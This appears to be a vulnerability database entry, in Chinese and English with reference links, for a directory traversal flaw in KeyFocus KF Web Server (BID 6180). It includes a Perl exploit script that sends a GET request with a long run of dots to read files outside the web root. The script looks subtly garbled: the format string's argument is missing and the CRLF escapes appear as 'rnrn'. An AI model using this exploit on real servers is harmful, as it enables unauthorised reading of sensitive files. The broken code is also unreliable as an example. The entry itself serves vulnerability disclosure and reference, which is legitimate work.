https://www.exploit-db.com/exploits/22018
https://cxsecurity.com/issue/WLB-2007110005
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-755

KeyFocusWeb服务程序是一款多功能的HTTP服务程序，支持多种日志格式，目录索引，预定义MIME设置，URL检查等功能。KeyFocusWeb服务程序不正确处理文件名包含’.’字符的请求，远程攻击者可以利用这个漏洞进行目录遍历攻击。攻击者提交多个’.’字符的WEB请求，可导致脱离WEBROOT目录，而以WEB进程的权限遍历系统目录，查看任意可查看的敏感文件内容。

source: http://www.securityfocus.com/bid/6180/info

KeyFocus KF Web Server is vulnerable to a directory traversal attack. This is due to the web server's inability to properly handle file names containing consecutive dot characters. By exploiting this vulnerability, an attacker is able to break out of the web root and retrieve any file readable by the web server. Only files of recognized MIME types can be retrieved. 

#!/usr/bin/perl
use URI::Escape;
use IO::Socket;
if (@ARGV < 2) {
print STDOUT "Usage: perl $0 [filename] [host] [port]";
} else {
$f =
IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp");
$url = uri_escape($ARGV[0]);
$exploit = sprintf("GET /.............../%s HTTP/1.0rnrn");
print $f $exploit;
undef $f;
}

来源:BID
名称:6180
链接:http://www.securityfocus.com/bid/6180
来源:BUGTRAQ
名称:20021113KeyFocusKFWebServerFileDisclosureVulnerability
链接:http://www.securityfocus.com/archive/1/299742
来源:www.keyfocus.net
链接:http://www.keyfocus.net/kfws/support/
来源:XF
名称:keyfocus-get-directory-traversal(10622)
链接:http://www.iss.net/security_center/static/10622.php
来源:SREASON
名称:3331
链接:http://securityreason.com/securityalert/3331
来源:VULNWATCH
名称:20021113KeyFocusKFWebServerFileDisclosureVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0073.html
来源：NSFOCUS
名称：3844
链接：http://www.nsfocus.net/vulndb/3844